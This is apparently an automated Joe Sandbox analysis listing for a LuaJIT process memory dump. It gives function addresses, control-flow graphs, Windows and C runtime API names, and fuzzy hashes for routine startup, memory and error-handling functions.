                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                        • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction ID: e8140d158c2c6186a5500382b26df002da6016975c310b3441428b21c63ac51c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction Fuzzy Hash: F0314C23E0F243B6EA14BB249421BB9D2919F41788FC45435E54D8B6D3DE3FF408A279
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A58C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3696288210-0
                                                                                                                                                                        • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction ID: ab2575f92df627165b459ad304ccf3cd5d64acc93d7e744c3fb507dc620f3084
                                                                                                                                                                        • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction Fuzzy Hash: BC21386361EE4991EA60AB15E44062BE7F0FB987E4F500335E6CD42BB8DF3DD5809B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A4FD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 413 7ff738a4fd90-7ff738a4fdb6 414 7ff738a4fdb8-7ff738a4fdc8 413->414 415 7ff738a4fdd0-7ff738a4fde2 413->415 414->415 416 7ff738a4fe3c-7ff738a4fe4f 415->416 417 7ff738a4fde4-7ff738a4fdf6 415->417 419 7ff738a5004b-7ff738a50067 416->419 420 7ff738a4fe55-7ff738a4fe68 416->420 417->416 418 7ff738a4fdf8-7ff738a4fdfd 417->418 423 7ff738a4fe03-7ff738a4fe15 418->423 424 7ff738a4feb0-7ff738a4fee0 call 7ff738a4f4a0 418->424 421 7ff738a50069-7ff738a50085 419->421 422 7ff738a5008a-7ff738a5008f 419->422 420->419 425 7ff738a4fe6e-7ff738a4fe73 420->425 427 7ff738a5010b-7ff738a5010f 421->427 428 7ff738a500fb 422->428 429 7ff738a50091-7ff738a500a0 422->429 423->424 430 7ff738a4fe1b-7ff738a4fe3a 423->430 437 7ff738a4ff78-7ff738a50000 call 7ff738a4f180 * 3 424->437 438 7ff738a4fee6-7ff738a4ff0f call 7ff738a4f4a0 424->438 425->424 431 7ff738a4fe75-7ff738a4fe88 425->431 435 7ff738a50114-7ff738a50131 427->435 434 7ff738a50103-7ff738a50107 428->434 429->428 433 7ff738a500a2-7ff738a500be 429->433 430->416 430->424 431->424 436 7ff738a4fe8a-7ff738a4feaa 431->436 433->428 439 7ff738a500c0-7ff738a500f9 433->439 434->427 440 7ff738a50133-7ff738a5014f 435->440 441 7ff738a50154-7ff738a50159 435->441 436->419 436->424 470 7ff738a50035-7ff738a50041 437->470 471 7ff738a50002-7ff738a5002d 437->471 438->437 454 7ff738a4ff11-7ff738a4ff24 438->454 439->434 446 7ff738a501d5-7ff738a50201 440->446 442 7ff738a5015b-7ff738a5016a 441->442 443 7ff738a501c5 441->443 442->443 447 7ff738a5016c-7ff738a50188 442->447 448 7ff738a501cd-7ff738a501d1 443->448 450 7ff738a50203-7ff738a50213 446->450 451 7ff738a5022f-7ff738a50238 446->451 447->443 453 7ff738a5018a-7ff738a501c3 447->453 448->446 450->435 455 7ff738a50219-7ff738a50229 450->455 456 7ff738a5024c-7ff738a502a0 call 7ff738a4f250 call 7ff738a4f2a0 451->456 457 7ff738a5023a-7ff738a50247 call 7ff738a40950 451->457 453->448 459 7ff738a4ff3b-7ff738a4ff47 454->459 460 7ff738a4ff26-7ff738a4ff39 454->460 455->435 455->451 476 7ff738a503b6-7ff738a503e8 call 7ff738a4f2f0 call 7ff738a4f120 456->476 477 7ff738a502a6-7ff738a502b5 456->477 457->456 465 7ff738a4ff4f-7ff738a4ff73 call 7ff738a40a70 459->465 460->459 460->465 475 7ff738a50467-7ff738a5046e 465->475 470->475 471->470 476->415 495 7ff738a503ee-7ff738a5040e 476->495 478 7ff738a502fd-7ff738a50302 477->478 479 7ff738a502b7-7ff738a502f8 call 7ff738a6e9c0 477->479 483 7ff738a5037d-7ff738a50381 478->483 484 7ff738a50304-7ff738a50313 478->484 491 7ff738a503b1 479->491 488 7ff738a50383-7ff738a50394 call 7ff738a61a40 483->488 489 7ff738a50396-7ff738a503ac call 7ff738a82fe0 483->489 484->483 487 7ff738a50315-7ff738a50331 484->487 487->483 493 7ff738a50333-7ff738a5037b call 7ff738a6e9c0 487->493 488->491 489->491 493->491 498 7ff738a50465 495->498 499 7ff738a50410-7ff738a50415 495->499 498->475 501 7ff738a50417-7ff738a50454 499->501 502 7ff738a50458-7ff738a50460 call 7ff738a48660 499->502 501->502 502->498
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                        • Opcode ID: 42b03ba9e73f26ef3ff5bce6f6d6021bda52361ae5da36bdbd1b7fcc2366f800
                                                                                                                                                                        • Instruction ID: ab5af5df78fd66358b489b28d845c451da8f683abf9aedfe5f3277fab792e60a
                                                                                                                                                                        • Opcode Fuzzy Hash: 42b03ba9e73f26ef3ff5bce6f6d6021bda52361ae5da36bdbd1b7fcc2366f800
                                                                                                                                                                        • Instruction Fuzzy Hash: 86021137619B8585DA709B2AD48022EF7A0F789BA4F504332EAAD877E5CF3DD4409B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A541F0 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 297COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 548 7ff738a541f0-7ff738a5425a call 7ff738afaef8 GetLastError 551 7ff738a5425c-7ff738a54288 call 7ff738a53530 548->551 552 7ff738a5428d-7ff738a542fa call 7ff738a33037 548->552 551->552 556 7ff738a542fc-7ff738a54302 552->556 557 7ff738a54307-7ff738a5430c 552->557 558 7ff738a54723-7ff738a5472a 556->558 559 7ff738a5430e-7ff738a54341 call 7ff738a53530 557->559 560 7ff738a54346-7ff738a5434b 557->560 559->560 561 7ff738a5434d-7ff738a54364 560->561 562 7ff738a5436a-7ff738a5437f 560->562 561->562 564 7ff738a5444d-7ff738a5447f 561->564 562->564 565 7ff738a54385-7ff738a5439f call 7ff738aaee70 562->565 566 7ff738a5448e-7ff738a54493 564->566 567 7ff738a54481-7ff738a54487 564->567 565->564 575 7ff738a543a5-7ff738a54448 call 7ff738a53660 call 7ff738a53510 * 2 call 7ff738a56790 call 7ff738aaf070 565->575 569 7ff738a54495-7ff738a544ac 566->569 570 7ff738a544b0-7ff738a544c0 566->570 567->558 569->570 572 7ff738a544ae 569->572 573 7ff738a544d4-7ff738a544e9 570->573 574 7ff738a544c2-7ff738a544d2 570->574 576 7ff738a54509-7ff738a54518 572->576 579 7ff738a544eb-7ff738a544f0 call 7ff738a48660 573->579 580 7ff738a544f5 573->580 574->573 577 7ff738a544f7-7ff738a54504 call 7ff738a56620 574->577 575->564 584 7ff738a545fb-7ff738a54625 call 7ff738afaef8 SetLastError 576->584 585 7ff738a5451e-7ff738a54562 call 7ff738a53610 576->585 577->576 579->580 580->576 594 7ff738a5462b-7ff738a54630 584->594 595 7ff738a546c4-7ff738a546f1 584->595 592 7ff738a54579-7ff738a54588 585->592 593 7ff738a54564-7ff738a54573 585->593 597 7ff738a545dc-7ff738a545e1 592->597 598 7ff738a5458a-7ff738a545da 592->598 593->584 593->592 599 7ff738a54645-7ff738a54684 594->599 600 7ff738a54632-7ff738a54637 594->600 595->558 597->584 602 7ff738a545e3-7ff738a545f7 597->602 598->584 599->558 600->599 603 7ff738a54639-7ff738a5463e 600->603 602->584 605 7ff738a54689-7ff738a546c2 603->605 606 7ff738a54640-7ff738a54702 603->606 605->558 610 7ff738a54704-7ff738a5471f 606->610 611 7ff738a54721 606->611 610->558 611->558
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: I
                                                                                                                                                                        • API String ID: 1452528299-3707901625
                                                                                                                                                                        • Opcode ID: 1531ca18713afc799c8f2ef2775fe20da84f2d7cb99f84b19dd3da76f019ca22
                                                                                                                                                                        • Instruction ID: 90893d97c1b2abc744fb0a00d8a15bed1e51196b2416aed816471504f4481cfc
                                                                                                                                                                        • Opcode Fuzzy Hash: 1531ca18713afc799c8f2ef2775fe20da84f2d7cb99f84b19dd3da76f019ca22
                                                                                                                                                                        • Instruction Fuzzy Hash: 74E10A77619B8586DB60DB1AE48076AB7B0F7C8B94F500226EACD83BA4CF3DD540DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A430A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 1452528299-2967466578
                                                                                                                                                                        • Opcode ID: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                        • Instruction ID: 1867fa553cb279dd6d37d3f9d986128c04a02cb61376ac20935cb49a1fe0f9b5
                                                                                                                                                                        • Opcode Fuzzy Hash: dc7aa63d98f7a6b8676f16d7f75754d7e493f1b49019153a7c34ee2b34105215
                                                                                                                                                                        • Instruction Fuzzy Hash: 33513D33A19B8586DB50DB19E48062AF7A0F7C8BA4F940235EAAD877A4CF3DD441DF14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFAD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction ID: dfba194f582a5268ebd122c761377787c461388ca89c85970ebc028b89d77c0b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction Fuzzy Hash: C7E04821B0574757EB547B615C8577DE252AF45B52F94843AC80E033A2CE3FF449932A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A58BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction ID: f05ee5ba4fd477b06d73d607fa342382169142b64e8154eff4a5820fc3f8fc33
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 40F01D72529B8592D720AB14E44471EF760F7887B4F400324E6ED02BE8CF3DD1448B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A58C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction ID: a004824deb45ea4b453b0a45e3bb711f85ef58bdf6322ba4e0807154e5c960b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction Fuzzy Hash: D1F01D72529B8596D720AB14E44471AF760F7887F4F400334E6ED02BE8CF3DD1449B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A4B7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-3916222277
                                                                                                                                                                        • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction ID: 748a450987bd9eb74bea5bd6cc36c030ff3d0ab200063deaf09b5ed84a61458e
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51C737619A8486DB50DB19E08072AF7B0F7C9B90F541126FB8E87B69CB39D4418F04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B16500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Info
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                                                        • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                        • Instruction ID: 5e31cc5de46b70ded0726bdbc3d7f7313b4fc345a8a4b559957c1ea29c747bc3
                                                                                                                                                                        • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                        • Instruction Fuzzy Hash: AA51043391C2C296E7209F24D0443EEFBA1F749B48F944135EA8E4BA89CB3DD405DBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A35D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsupr_s
                                                                                                                                                                        • String ID: arg
                                                                                                                                                                        • API String ID: 600324503-2022414218
                                                                                                                                                                        • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction ID: b4c1afa143b4fce1ca14a56ed0419847d4ae7d57b9ebc7412877934d019faf0e
                                                                                                                                                                        • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction Fuzzy Hash: B331733260964197D620EB29E44162AF3A0FBC9794F900231FA8D877A9DF7FD9019F14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B169D8 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF738B163F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF738B16714,?,?,?,?,00000000,COMSPEC,?,00007FF738B169AE), ref: 00007FF738B1641A
